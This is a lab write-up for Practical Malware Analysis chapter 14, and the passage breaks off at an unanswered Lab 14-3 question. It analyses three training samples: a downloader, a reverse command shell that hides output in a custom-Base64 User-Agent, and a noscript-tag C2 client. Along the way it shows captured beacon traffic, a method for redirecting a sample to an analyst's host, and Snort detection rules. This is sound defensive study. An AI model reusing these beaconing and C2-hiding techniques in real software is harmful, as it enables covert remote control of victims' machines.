Practical Malware Analysis - Chapter 14 Lab Write-up
Chapter 14. Malware-Focussed Network Signatures
Operations Security (OPSEC) Considerations:
- The safest option is not to be connected to the internet at all when analysing malware.
- If you must, use passive information gathering or indirection tactics.
Indirection Tactics:
- Utilise Tor, an open proxy, or a web-based anonymiser when investigating.
- Utilise a dedicated machine for research and hide location via cellular connection, tunnelling via SSH or VPN to remote infrastructure, and/or use a cloud service such as Amazon EC2.
- Note: Cloud services may have specific terms governing malware research. Check these to avoid having your service suspended.
- Utilise a cloud-based sandbox which allows interaction for analysis.
- Note: Many free cloud-based sandboxes are public, which immediately risks alerting an adversary that you’re performing analysis.
- Utilise a cloud-based search/scanning service.
- Note: Many free cloud-based search/scanning services are public, which immediately risks alerting an adversary that you’re performing analysis.
Commonly used cloud-based tools (As of writing):
- Hybrid Analysis (Falcon Sandbox)
- Any Run (Interactive Online Sandbox)
- Intezer Analyze (Malware Analysis Platform)
- CAPE (Malware Configuration and Payload Extraction Sandbox)
- VirusTotal (File and URL Malware Identification)
- Urlscan.io (Web/URL Scanning Sandbox)
- PublicWWW (Web Source Code Search Engine)
- Threat Crowd (Threat Search Engine)
- Alienvault OTX (Open Threat Intel)
- RiskIQ (Security Intelligence)
- Whois Domain Lookup
- DomainTools (Whois, Domain, DNS Searching)
- MXToolbox (Mail, DNS, and more lookup tools)
- RobTex (Unified Domain, IP, Route and ASN lookup)
- SecurityTrails (Historical DNS Lookup)
Note: This lab uses Snort rules, and in many instances the roles of $HOME_NET and $EXTERNAL_NET have been swapped. Because we are simulating an external C2 using local systems, $HOME_NET has often been used to test our rules where $EXTERNAL_NET would normally be appropriate (to indicate the connection is coming from an external source).
Lab 14-1
Analyze the malware found in file Lab14-01.exe. This program is not harmful to your system.
Question 1
Which networking libraries does the malware use, and what are their advantages?
Answer 1
Opening the malware using PE-bear, we find that it imports the Windows DLL urlmon.dll (OLE32 Extensions for Win32), which provides Object Linking and Embedding (OLE) based API calls. From this DLL it imports ‘URLDownloadToCacheFileA’, which leverages COM objects.
By using Fakenet-NG and running this malware, we can see that it beacons to www.practicalmalwareanalysis.com with the below GET request.
GET /ODA6NmU6NmY6NmU6Njk6NjMtSUVVc2Vy/y.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: www.practicalmalwareanalysis.com
Connection: Keep-Alive
If we now use WhatIsMyBrowser, a cloud-based User-Agent parser, we can ascertain whether this is likely to be a valid, known User-Agent.
In this instance it is, and it correctly identifies the OS the malware was run on. This is one of the advantages of using COM interfaces: the request API automatically uses the appropriate User-Agent for the operating system, so the beacon blends in with normal browser traffic.
Question 2
What source elements are used to construct the networking beacon, and what conditions would cause the beacon to change?
Answer 2
In the above example we can see that the networking beacon came out as ‘ODA6NmU6NmY6NmU6Njk6NjMtSUVVc2Vy’. Running the malware again on the same host reveals the same output. By Base64 decoding this we get the below.
- 80:6e:6f:6e:69:63-IEUser
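This decoding can be reproduced offline with Python’s standard base64 module. It works directly here because the 32-character path segment is a multiple of 4 and needs no padding, so the malware’s non-standard padding character (covered in question 4) doesn’t come into play.

```python
import base64

# Path segment taken from the observed beacon: GET /<segment>/y.png
segment = "ODA6NmU6NmY6NmU6Njk6NjMtSUVVc2Vy"

# 32 characters is a multiple of 4, so no padding is involved
decoded = base64.b64decode(segment).decode("ascii")
print(decoded)  # 80:6e:6f:6e:69:63-IEUser
```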
In this instance we believe the first element is a MAC address of some kind, followed by ‘-’ and the currently logged-on user. If we run ‘getmac’ to check whether this is taken from the network adapters on this system, we find that it doesn’t match.
To further investigate what this is made up from we can open Lab14-01.exe in IDA.
Immediately we can see that a call to GetCurrentHwProfileA is run prior to a call to GetUserNameA which helps to back up what we’ve found so far.
Another way of retrieving the GUID referenced by this API is to check the registry.
reg query "HKLM\System\CurrentControlSet\Control\IDConfigDB\Hardware Profiles" /s
From this we can see that the networking beacon uses the hardware profile GUID returned by this API, taking its last section (12 hex characters), which matches the value stored under this registry key.
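As a sketch of that formatting step, the Python below takes a hardware profile GUID string, keeps its last 12 hex characters, joins them in pairs with colons, and appends ‘-’ and the username. The function name is hypothetical, and the GUID is hypothetical too: only its final 12 characters, recovered from the decoded beacon, come from the lab host. This reproduces the output format, not the malware’s actual C code.

```python
def beacon_plaintext(hw_profile_guid: str, username: str) -> str:
    """Rebuild the 'xx:xx:xx:xx:xx:xx-<user>' string that the beacon encodes."""
    # Drop the surrounding braces and keep the last 12 hex characters
    tail = hw_profile_guid.strip("{}")[-12:]
    # Split into six 2-character pairs and join them with colons
    pairs = [tail[i:i + 2] for i in range(0, 12, 2)]
    return ":".join(pairs) + "-" + username

# Hypothetical GUID; only the final 12 characters match the lab host
print(beacon_plaintext("{00000000-0000-0000-0000-806e6f6e6963}", "IEUser"))
```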
If we run this again on a different machine, we find that it has a different User-Agent for the new OS.
GET /ODA6NmQ6NjE6NzI6Njk6NmYtYm9i/i.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Host: www.practicalmalwareanalysis.com
Connection: Keep-Alive
We also see new Base64-encoded data based on this system’s GUID and user account, which decodes to:
- 80:6d:61:72:69:6f-bob
Question 3
Why might the information embedded in the networking beacon be of interest to the attacker?
Answer 3
As the information uncovered above is meant to be used for uniquely identifying systems and users, this may be of interest to an attacker who wants to keep track of infected clients and specifically target certain users or systems.
Question 4
Does the malware use standard Base64 encoding? If not, how is the encoding unusual?
Answer 4
If we look at the Strings window of this malware we can see what appears to be a Base64-encoding index string.
By looking at cross-references to this we find it is used inside ‘sub_401000’, which appears to be our encoding routine. Of interest is that this routine uses a modified padding character, ‘61h’ (‘a’), meaning that any padding required in the Base64-encoded data will appear as the letter ‘a’ rather than the standard ‘=’.
We recognise this construct as it is similar to what we saw in Lab 13-1, question 5 except with the change of padding character.
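The effect of the modified padding can be sketched by wrapping Python’s standard encoder and substituting ‘a’ for ‘=’. This assumes, as the Strings window suggests, that the index string is otherwise the standard Base64 alphabet and only the padding character differs; the function name is hypothetical.

```python
import base64

def pma_b64encode(data: bytes) -> str:
    """Standard Base64, but with 'a' used as the padding character instead of '='."""
    # '=' only ever appears as padding in standard output, so replace() is safe here
    return base64.b64encode(data).decode("ascii").replace("=", "a")

print(pma_b64encode(b"80:6e:6f:6e:69:63-IEUser"))  # 24 bytes, no padding needed
print(pma_b64encode(b"ab"))  # YWIa: one padding character, rendered as 'a'
```

Because ‘a’ is also an ordinary Base64 character, padding is no longer distinguishable from data, which is relevant to the signature pitfalls discussed in question 7.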
Question 5
What is the overall purpose of this malware?
Answer 5
To determine this we need to move back to the main method of this malware and examine the call it makes to ‘sub_4011A3’ after the base64-encoding routine occurs. Within this routine we find that a call is made to ‘URLDownloadToCacheFileA’ which is used to download a file to the internet cache directory and return the file name/location.
Of interest is that this file name is also passed directly to CreateProcessA, so the downloaded file would be run immediately. Examining the calling code reveals that if this fails, the malware waits ‘0EA60h’ (60,000 milliseconds, i.e. 60 seconds) before trying to download it again.
As such this malware can be considered a ‘Downloader and Launcher’ (loosely, a ‘Dropper’) used to download and execute further code.
Question 6
What elements of the malware’s communication may be effectively detected using a network signature?
Answer 6
Examining the beacon, we know it always sends the Base64-encoded values followed by a single-character .png resource, which is one element that remains consistent. Note that this character is taken from the final character of the Base64-encoded content.
In addition we know it sends Base64-encoded data via the %s variable passed to sprintf, which contains a MAC-style value followed by ‘-’ and a username. Although the username and specific MAC-style value will likely change, the colons and dash which separate them remain consistent, making this another element that can be used.
Finally the beacon makes a request to www.practicalmalwareanalysis.com which is a consistent C2 in this case, making it once again a useful element to use.
Question 7
What mistakes might analysts make in trying to develop a signature for this malware?
Answer 7
Analysts may make a signature too broad or too narrow. In this instance, if no analysis was done on how the beacon is created and on its abnormal padding, an analyst might conclude that ‘a.png’ is always being retrieved (for example, if the observed sample needed padding, making the last character of the Base64-encoded string, and therefore the file name, ‘a’). Another mistake would be to target the User-Agent, username, MAC-style value, or any other field which is set dynamically based on the system the malware runs on. Finally, a rule that alerted on any traffic to this domain would be far too broad if the domain were compromised or reused.
Question 8
What set of signatures would detect this malware (and future variants)?
Answer 8
To detect this malware we’re going to want to create at least 2 Snort rules, one to identify Base64-encoded data sent when fetching the single character png resource, and one to identify any base64-encoded data which has a pattern involving colons and finally a ‘-‘ character.
Creating colon and dash signature:
Because we know this data is Base64-encoded, we first need to look at how the plaintext translates into the Base64-encoded data we will see. Every 4 characters of Base64 encode 3 bytes of plaintext, and each hex pair plus its following separator forms exactly one 3-byte group. As a result, each group ending in a colon encodes to 4 characters ending in the number ‘6’, and the group ending in the dash encodes to 4 characters ending in the letter ‘t’.
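This alignment claim can be checked by brute force: every 3-byte group of the form ‘&lt;hex pair&gt;:’ should encode to four characters ending in ‘6’, and every ‘&lt;hex pair&gt;-’ group to four characters ending in ‘t’. The sketch below tries all 256 lowercase hex pairs with Python’s standard encoder; the custom padding never applies to a full 3-byte group, so the standard encoder is sufficient here.

```python
import base64

def last_char_of_group(group: bytes) -> str:
    # A full 3-byte group always encodes to exactly 4 characters with no padding;
    # the 4th character encodes the low 6 bits of the group's third byte
    return base64.b64encode(group).decode("ascii")[-1]

hex_pairs = [f"{i:02x}" for i in range(256)]

colon_endings = {last_char_of_group(p.encode() + b":") for p in hex_pairs}
dash_endings = {last_char_of_group(p.encode() + b"-") for p in hex_pairs}

print(colon_endings, dash_endings)  # {'6'} {'t'}
```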
From this we need to create some regex which will be used to identify the above pattern signified in words below.
- 3 characters followed by the number ‘6’, 5 times.
- 3 characters followed by the letter ‘t’, 1 time.
- 4 or more characters.
An easy way to start piecing this together is to use an online validation tool such as regex101.
Starting with some Base64 detection logic, we want to look for any possible Base64 character. Note that we’ve modified the character class from “[A-Za-z0-9+\/=]” to “[A-Za-z0-9+\/a]” due to the custom padding character (since ‘a’ is already covered by the a-z range, this is effectively the standard alphabet without ‘=’), and we’re using a quantifier to match 3 instances followed by the number ‘6’.
[A-Za-z0-9+\/a]{3}6
This makes up the first part of our pattern mentioned above. By changing the number ‘6’ to the letter ‘t’, we get the second part of our detection pattern.
[A-Za-z0-9+\/a]{3}t
To get the third part of our detection pattern we can simply match on 4 or more characters.
[A-Za-z0-9+\/a]{4,}
Finally, we can piece this all together by using a capture group and by specifying the number of hits required.
([A-Za-z0-9+\/a]{3}6){5}[A-Za-z0-9+\/a]{3}t[A-Za-z0-9+\/a]{4,}
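Before loading the expression into Snort, it can be sanity-checked locally. The sketch below runs the same pattern through Python’s re module, whose syntax is compatible with PCRE for this particular expression, against the two beacon path segments observed earlier plus an unrelated Base64 string.

```python
import re

# Same expression as above; '\/' inside the class is simply a literal '/'
PATTERN = re.compile(r"([A-Za-z0-9+\/a]{3}6){5}[A-Za-z0-9+\/a]{3}t[A-Za-z0-9+\/a]{4,}")

samples = {
    "ODA6NmU6NmY6NmU6Njk6NjMtSUVVc2Vy": True,   # 80:6e:6f:6e:69:63-IEUser
    "ODA6NmQ6NjE6NzI6Njk6NmYtYm9i": True,       # 80:6d:61:72:69:6f-bob
    "dGVuZm91ci5odG1s": False,                  # unrelated Base64 ("tenfour.html")
}

for segment, expected in samples.items():
    matched = PATTERN.search(segment) is not None
    print(segment, matched, "OK" if matched == expected else "UNEXPECTED")
```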
Piecing this into a Snort rule we need to ensure this is for the following conditions:
- Only HTTP ports
- Only URIs longer than 31 characters, preceded by ‘GET /’ and followed by the fetched file name (a conservative bound, since the shortest possible plaintext, a 17-character MAC-style value plus ‘-’ and a 1-letter username, is already 19 bytes before encoding)
- Only GET requests
- Only within the first 10 bytes of the payload
- Uses perl compatible regex (same as what we used for validation with regex101)
- Uses a SID of 1,000,000 or above (SIDs below 1,000,000 are reserved for rules distributed with Snort)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"PMA Lab14-01 colon and dash"; urilen:>31; content:"GET|20|/"; depth:10; pcre:"/GET\x20\/([A-Za-z0-9+\/a]{3}6){5}[A-Za-z0-9+\/a]{3}t[A-Za-z0-9+\/a]{4,}\//"; sid:1337347; rev:1;)
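The minimum URI length behind ‘urilen:>31’ can be worked through as follows, assuming a 1-letter username: the colon-separated value is always 17 characters, the dash adds 1, Base64 rounds up to whole 4-character groups, and the URI then adds two slashes and a one-character ‘.png’ file name.

```python
import math

mac_like = len("80:6e:6f:6e:69:63")            # always 17 characters
plaintext_len = mac_like + 1 + 1                # '-' plus a 1-letter username = 19 bytes
encoded_len = math.ceil(plaintext_len / 3) * 4  # 28 Base64 characters, including padding
uri_len = 1 + encoded_len + 1 + len("x.png")    # "/<encoded>/x.png" = 35

print(encoded_len, uri_len)  # 28 35
```

Since the shortest possible beacon URI is 35 characters, ‘urilen:>31’ leaves some margin while still excluding short URIs.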
Using Snort, which we’ve set up and configured on a pfSense firewall, we can add our custom Snort rule.
At this point by running the malware we find that our new Snort rule works and we’ve created our colon and dash signature.
Creating Base64 and png signature:
For our second rule we can do something similar to the above, but instead look only for .png files requested after a Base64-encoded string, where the requested file name is the last character of that Base64-encoded string.
[A-Z0-9a-z+\/a]{24,}([A-Z0-9a-z+\/a])\/\1\.png
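The back-reference can be exercised locally in the same way. Python’s re module treats ‘\1’ like PCRE does, so the sketch below requires the file name to repeat the last character captured before the slash; a path whose file name doesn’t match is rejected.

```python
import re

# Same expression as above: group 1 captures the final encoded character
PNG_PATTERN = re.compile(r"[A-Z0-9a-z+\/a]{24,}([A-Z0-9a-z+\/a])\/\1\.png")

paths = [
    "/ODA6NmU6NmY6NmU6Njk6NjMtSUVVc2Vy/y.png",  # observed beacon: should match
    "/ODA6NmQ6NjE6NzI6Njk6NmYtYm9i/i.png",      # observed beacon: should match
    "/ODA6NmU6NmY6NmU6Njk6NjMtSUVVc2Vy/x.png",  # file name is not the last char
]

for path in paths:
    m = PNG_PATTERN.search(path)
    print(path, m.group(1) if m else None)
```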
The end result is the below Snort rule.
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"PMA Lab14-01 Base64 and png"; urilen:>31; uricontent:".png"; pcre:"/\/[A-Z0-9a-z+\/a]{24,}([A-Z0-9a-z+\/a])\/\1\.png/"; sid:1337348; rev:1;)
By adding this Snort rule into our pfSense box and running the malware again, we see that both of our Snort rules have been hit.
At this point we’ve now developed some network signatures to detect this malware now and in the future. By combining these with any network traffic to www.practicalmalwareanalysis.com we should have a robust way of detecting this dropper over the wire.
Lab 14-2
Analyze the malware found in file Lab14-02.exe. This malware has been configured to beacon to a hard-coded loopback address in order to prevent it from harming your system, but imagine that it is a hard-coded external address.
Question 1
What are the advantages or disadvantages of coding malware to use direct IP addresses?
Answer 1
If we consider malware that uses direct IP addresses there are a number of advantages and disadvantages for both the malware author, and the defender. If we take this from the malware author’s perspective the following applies.
Advantages:
- IP addresses may host numerous legitimate websites or services, and as such it may be difficult for a defender to just block this at a firewall.
- A static IP address isn’t susceptible to DNS sinkholing, whereby a malicious domain is redirected to defender-controlled infrastructure.
- A domain doesn’t need to be registered, and so there’s no risk of the domain registration being seized, or leaking information that could be used to identify or track the malware author and their actions.
Disadvantages:
- Web requests to a public IP are often suspicious as most people only browse websites through their associated DNS entry.
- Using a static IP prevents the use of techniques such as domain fronting.
- Static IP addresses are more difficult to maintain, as the infrastructure the malware points to is hard-coded, whereas a domain can be redirected simply by updating its DNS records if infrastructure is taken down.
Question 2
Which networking libraries does this malware use? What are the advantages or disadvantages of using these libraries?
Answer 2
Using CFF Explorer VIII we can see that this makes use of WinInet.dll and its associated API calls.
- InternetCloseHandle
- InternetOpenUrlA
- InternetOpenA
- InternetReadFile
An advantage of these API calls is that they are more granular and as such give control over caching and cookies. In addition, they don’t rely on a COM object which, if corrupted, could cause issues.
A disadvantage of these API calls is that many elements, such as the User-Agent, must be specified manually. Microsoft’s documentation provides a comparison between WinInet and WinHTTP.
Question 3
What is the source of the URL that the malware uses for beaconing? What advantages does this source offer?
Answer 3
If we use Fakenet-NG and run the malware, we can see that it makes a request to the local loopback IP 127.0.0.1 (in this case we pretend this is a C2 IP). The first request carries a long, unusual User-Agent, and it is followed by a second request with the unusual User-Agent ‘Internet Surf’.
Lab14-02.exe (2140) requested TCP 127.0.0.1:80
GET /tenfour.html HTTP/1.1
User-Agent: (!<e6LJC+xnBq90daDNB+1TDrhG6p9LC/iNBqsGiIsVgJCqhZaDZoNZBrXtC+L/AcoGfbhNdZdUhZKGe6LJC+xnBq90dliTC/XTC+a0A6xSgIWGo6VQdc3N9qH0CmXm97iLC/9L9YsiYG0fonNC4c3T9r3HB41HDbaC8qHT8qxQ871LE5VQA63CCbpHBbaICmt+Bbam95V0BqxQCpVoC+aJDbLJ86UGe6aQDqam92XXB+aQE7iNCmXh863n7l3NB+amE4iTBbVL8r1NBqtCoqHHCc1LCLwVilUy
Host: 127.0.0.1
Cache-Control: no-cache
GET /tenfour.html HTTP/1.1
User-Agent: Internet Surf
Host: 127.0.0.1
Cache-Control: no-cache
To determine the source of this IP we can use IDA to work back from the WinInet networking calls we found earlier. The subroutines which call these are ‘sub_4015C0’ and ‘sub_401800’, the latter of which is also called by ‘sub_4015C0’.
If we look at how this is launched by examining cross-references, we find that these network connections are being launched in their own threads one after another from within WinMain which reflects what we’ve seen during the dynamic analysis above.
In both of these calls the source of the URL is being passed to them, so we need to continue looking back to see how this is fetched. Of note is that directly before these network calls we can see evidence of pipes being created and cmd.exe starting which leads us to believe this malware may be a reverse TCP command shell.
Of interest is that at the start of this program we find a call to ‘LoadStringA’, which loads a string resource into the buffer referenced by EAX (‘[esp+1A8h+Buffer]’). This is then loaded into EBX, which becomes the read handle, or ‘input’ stream, into this anonymous pipe. Because an Event Object is created to prevent thread conflicts, and multiple anonymous pipe operations take place, this can be difficult to follow in detail; in simplified terms, the URL loaded from the resource is passed to both networking threads, while the anonymous pipes connect those threads to the input and output of cmd.exe.
If we take a look at the resource section of this malware using PE-bear we can see that the C2 in question is what we saw in our dynamic analysis.
http://127.0.0.1/tenfour.html
From this we know that the source of the URL that the malware uses for beaconing is a string contained within the resource section of this malware. As embedded resources can be easily modified this provides an advantage of allowing the C2 to change, or for this to function as a backdoor to multiple different C2 servers without having to modify and recompile the binary.
Question 4
Which aspect of the HTTP protocol does the malware leverage to achieve its objectives?
Answer 4
From our dynamic analysis there looks to be some strange data contained within the User-Agent field so we investigate that further. First we look at the thread creation which uses the anonymous pipe we saw created in the previous section.
Within StartAddress at ‘0x004014C0’ we can see this calls ‘PeekNamedPipe’ with the read end of the anonymous pipe being referenced in ECX, and the output being sent to ESI (the source for an upcoming string operation).
In this instance, if content exists on the pipe (for example the output from cmd.exe starting, or the output of commands run in this terminal), the malware runs sub_401000, passing in ESI as its buffer, before running loc_401750.
Looking at sub_401000 which is passed the output from our anonymous pipe we find that this construct is familiar and looks to be a Base64-encoding routine which is leveraging a value defined by ‘byte_403010’.
Examining byte_403010, we find what looks to be an unknown byte value followed by our Base64 index string.
Converting the whole region into a string gives the index string we’d expect:
WXYZlabcd3fghijko12e456789ABCDEFGHIJKL+/MNOPQRSTUVmn0pqrstuvwxyz
In this instance the base pointer contains our base64 encoded content and is then used within loc_401750 to concatenate our encoded content with the value ‘(!<’.
From this we know that the malware leverages the User-Agent to achieve its objectives.
Question 5
What kind of information is communicated in the malware’s initial beacon?
Answer 5
Taking our output from running the malware and our knowledge from the above analysis on custom Base64 index string used, we can decode the output and confirm this is the standard output of cmd.exe being run.
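A minimal Python sketch of that decoding, assuming the malware uses ordinary Base64 bit-packing and differs only in its index string: each character is translated from the custom alphabet to the standard one at the same index, then decoded normally. Only the first 24 characters of the captured User-Agent (after the ‘(!<’ prefix) are used here, and the function name is hypothetical.

```python
import base64

CUSTOM = "WXYZlabcd3fghijko12e456789ABCDEFGHIJKL+/MNOPQRSTUVmn0pqrstuvwxyz"
STANDARD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# Map each custom-alphabet character to the standard character at the same index
TO_STANDARD = str.maketrans(CUSTOM, STANDARD)

def decode_user_agent(user_agent: str) -> bytes:
    """Strip the '(!<' marker and decode the remainder with the custom index string."""
    payload = user_agent.removeprefix("(!<")  # Python 3.9+
    return base64.b64decode(payload.translate(TO_STANDARD))

print(decode_user_agent("(!<e6LJC+xnBq90daDNB+1TDrhG"))  # b'Microsoft Windows '
```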
From this we know the initial beacon is the encoded command prompt banner, i.e. the output cmd.exe prints when it starts.
Question 6
What are some disadvantages in the design of this malware’s communication channels?
Answer 6
To identify some disadvantages in the design of this malware’s communication channels we can look within ‘sub_4015C0’ which is what is run within the second thread of this malware. Inside of this we immediately see this uses ‘sub_401800’ to make the outgoing internet connection, so we examine this further.
Inside sub_401800 we can see what appear to be very basic operations: a request is made with the hard-coded User-Agent “Internet Surf”, and the response is read and passed directly into the anonymous pipe feeding cmd.exe before the internet connection is closed.
At this point we know the communication channels both to and from the anonymous pipe to cmd.exe. What’s apparent is that outgoing connections use a hardcoded User-Agent which can be used to fingerprint this malware. In addition no encoding is done on commands being sent from the server.
To detect this malware we can create and test some Snort rules; however, given this is set to beacon to the local system’s loopback address, the traffic will never traverse our gateway, and as such our pfSense system running Snort will never see it. In addition, if nothing is listening on the receiving end, the initial connection fails before any User-Agent is sent, leaving no Snort rules triggered.
To get around this we first need to modify the resource section of this malware (e.g. using Resource Hacker) so it beacons to a private IP we control, on which we can run a couple of netcat listeners. One issue is that the malware reads a fixed number of characters from this resource, so whatever address we choose needs to be the same length (9 characters) as 127.0.0.1.
To get around this we can use a 9-character hostname (in this case CYBERAIJU) and modify our hosts file to point it to a private IP we control.
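Where a resource editor isn’t available, a similar edit can be approximated with a byte-level patch on a copy of the binary. This sketch is an alternative to the Resource Hacker approach, not the method used above. It assumes the URL lives in a string-table resource, which Windows stores as UTF-16LE, and refuses to patch unless the replacement has exactly the same length and the original appears exactly once. The function names and file paths are hypothetical.

```python
from pathlib import Path

def patch_resource_url(data: bytes, old: str, new: str) -> bytes:
    """Replace a single, same-length UTF-16LE string in a binary blob."""
    if len(old) != len(new):
        raise ValueError("replacement must be the same length as the original")
    old_bytes, new_bytes = old.encode("utf-16-le"), new.encode("utf-16-le")
    if data.count(old_bytes) != 1:
        raise ValueError("expected exactly one occurrence of the original string")
    return data.replace(old_bytes, new_bytes)

def patch_file(src: str, dst: str) -> None:
    # Hypothetical paths: write to a new file, since the sample may delete itself
    data = Path(src).read_bytes()
    patched = patch_resource_url(data, "http://127.0.0.1/tenfour.html",
                                 "http://CYBERAIJU/tenfour.html")
    Path(dst).write_bytes(patched)
```

For example, ‘patch_file("Lab14-02.exe", "Lab14-02-patched.exe")’ would leave the original sample untouched.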
Note - Depending on how the malware was run, whether there was a successful network connection, and how the malware threads are ended, we may find that the malware has deleted itself. It’s recommended a backup of the malware be created.
Creating Suspicious Resource signature:
In this instance we can now setup a basic Snort rule for the malware and see if this works. One consistent element in this malware is that it always fetches a resource at ‘/tenfour.html’ which although in itself may only be a low to medium fidelity indicator, is a good starting point.
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"PMA Lab14-02 Suspicious Resource"; uricontent:"/tenfour.html"; sid:1337349; rev:1;)
If we now setup netcat listeners on our receiving machine (in this case 10.13.13.107) and add in the created Snort rule we can see if it worked.
Upon running the malware we see 2 successful connections to our Netcat listeners for both threads as expected.
Checking our snort alerts we find 2 successful alerts based on connections to this C2 resource.
Creating Suspicious User Agent signatures:
Next we’re going to leverage the unique User-Agent elements used by this malware and set the classtype to ‘trojan-activity’ to give the alert more weighting and severity.
First we’ll use the ‘Internet Surf’ User-Agent.
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"PMA Lab14-02 Suspicious User-Agent - Internet Surf"; flow:to_server; content:"User-Agent|3A 20|Internet|20|Surf"; http_header; classtype:trojan-activity; sid:1337350; rev:1;)
We also alert on any User-Agent beginning with “(!<”.
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"PMA Lab14-02 Suspicious User-Agent - Starts with (!<"; flow:to_server; content:"User-Agent|3A 20|(!<"; http_header; classtype:trojan-activity; sid:1337351; rev:1;)
If we repeat the process used to test our suspicious resource signature, we see new alert hits this time, categorising the activity as a network trojan and assigning a severity (priority) level of 1.
The combination of these alerts is enough for any responder to have a strong indication of malicious activity occurring on this system.
Question 7
Is the malware’s encoding scheme standard?
Answer 7
From our analysis in question 4 we know that the malware’s encoding scheme is Base64 but not using the standard index string.
Question 8
How is communication terminated?
Answer 8
Looking back into this malware within IDA, after establishing a connection through ‘sub_401800’ contained within ‘sub_4015C0’, a comparison is then made looking for the term ‘exit’.
If this is found then the thread will exit and communication will be terminated. Inside of the main method we find that upon this program finishing or threads being killed this runs a sub-routine at ‘sub_401880’.
Taking a look into this sub-routine, it appears to be used simply to delete the malware’s own file once it has finished running, failed to run or connect back to its C2, or had its threads terminated.
Question 9
What is the purpose of this malware, and what role might it play in the attacker’s arsenal?
Answer 9
From our analysis above we know the purpose of this malware is to establish a reverse TCP command shell which passes data through a user-agent to try and evade network analysis techniques. Given the malware attempts to delete itself it’s likely this is only used during initial access to a system prior to further malware or persistence being setup and is simply a disposable means to an end.
Lab 14-3
This lab builds on Lab 14-1. Imagine that this malware is an attempt by the attacker to improve his techniques. Analyze the malware found in file Lab14-03.exe.
Question 1
What hard-coded elements are used in the initial beacon? What elements, if any, would make a good signature?
Answer 1
By running the malware and using Fakenet-NG, we can get a glimpse of the beacon this sends.
If we compare this beacon to elements seen in Lab14-1 we find the below.
Lab 14-1:
GET /ODA6NmU6NmY6NmU6Njk6NjMtSUVVc2Vy/y.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Host: www.practicalmalwareanalysis.com
Connection: Keep-Alive
Lab 14-3:
GET /start.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.practicalmalwareanalysis.com
Of interest is that this beacon has sent some new or modified elements in its HTTP Header including the below:
- Accept-Language
- UA-CPU
- User-Agent
Based on this we suspect these may be hard-coded elements. Looking closely at the User-Agent, the malware author appears to have a bug in their code, because the header value itself begins with “User-Agent: ”, duplicating the field name. This would make a good signature.
If we open IDA and look for references to this beacon based on the User-Agent, we find that in addition to the above 3 elements, the ‘Accept’ and ‘Accept-Encoding’ header fields are also hard-coded, as is the beacon URL.
http://www.practicalmalwareanalysis.com/start.htm
Question 2
What elements of the initial beacon may not be conducive to a longlasting signature?
Answer 2
If we examine the hard-coded URL above and where it is referenced, we find that it is located in a function ‘sub_401457’.
Of interest is that this function attempts to get a handle on the file C:\autobat.exe with read access. Where this fails, it calls ‘sub_401372’, which creates the file and writes the hard-coded C2 URL into it, before running this function again. Where this succeeds, it reads the file into a buffer which is later used by ‘sub_4011F3’ within the main method.
If we take a look at cross-references which call ‘sub_401372’, we find that there’s one other function which calls it within ‘sub_401651’. If we continue to examine cross-references it looks like this may be taking input from the C2 indicating that there’s another way for this C2 URL to be written to ‘C:\autobat.exe’. From this we can assume a couple of things:
- The domain and URL found in this are hard-coded but only if an existing file C:\autobat.exe with a configured C2 isn’t present.
- The domain, URL, Host, or GET parameters wouldn’t be conducive to a long-lasting signature.
- By creating a 0-byte inoculation file at C:\autobat.exe we can effectively prevent this malware from beaconing to its C2.
Question 3
How does the malware obtain commands? What example from the chapter used a similar methodology? What are the advantages of this technique?
Answer 3
Taking a closer look at sub_4011F3, which we found earlier, we can see that after initiating the C2 beacon connection and reading the .htm file hosted on the C2, it begins searching for elements which start with “<no”, in addition to calling sub_401000 before comparing other elements.
To properly unravel this we can take a closer look at sub_401000, which appears to be involved in constructing a comparison string. What is immediately obvious is that there are a number of comparisons against hex values, so this appears to be a string obfuscation technique intended to make analysis more challenging.
If we press ‘r’ on these hex values in IDA, we can convert them into their character equivalents. We also need to pay attention to the preceding movsx operations, which tell us the order in which the string comparison takes place (this takes the form of ‘register + position’).
If we expand these comparisons out and sort by the position number we get the below:
movsx ecx, byte ptr [eax]
cmp ecx, 'n'
movsx edx, byte ptr [ecx+1]
cmp edx, 'o'
movsx eax, byte ptr [edx+2]
cmp eax, 's'
movsx ecx, byte ptr [eax+3]
cmp ecx, 'c'
movsx ecx, byte ptr [eax+4]
cmp ecx, 'r'
movsx eax, byte ptr [edx+5]
cmp eax, 'i'
movsx edx, byte ptr [ecx+6]
cmp edx, 'p'
movsx eax, byte ptr [edx+7]
cmp eax, 't'
movsx edx, byte ptr [ecx+8]
cmp edx, '>'
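This in turn allows us to see that it is checking for the characters ‘noscript>’, i.e. the “<noscript>” tag.
Based on the searches and comparisons taking place, we can assume this filter is looking for something similar to the following, where the values in angle brackets (other than the noscript tag itself) are placeholders: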
<noscript><DYNAMICCONTENT>http://www.practicalmalwareanalysis.com/<COMMAND>/<ARG>96'
For a final piece of analysis we take a look at sub_401684, which is run immediately after this response is parsed and appears to run one of 3 different subroutines depending on the response received.
This leads us to believe that the malware obtains commands through <noscript> tags, which is similar to Lab06-02.exe, which leveraged ‘<!--’ HTML comments in web pages for C2. The advantage of this technique is that the commands are fetched from inside a legitimate-looking web page, so without thoroughly scrutinising the page or the malware it would be hard to fingerprint or even detect this malware.
Question 4
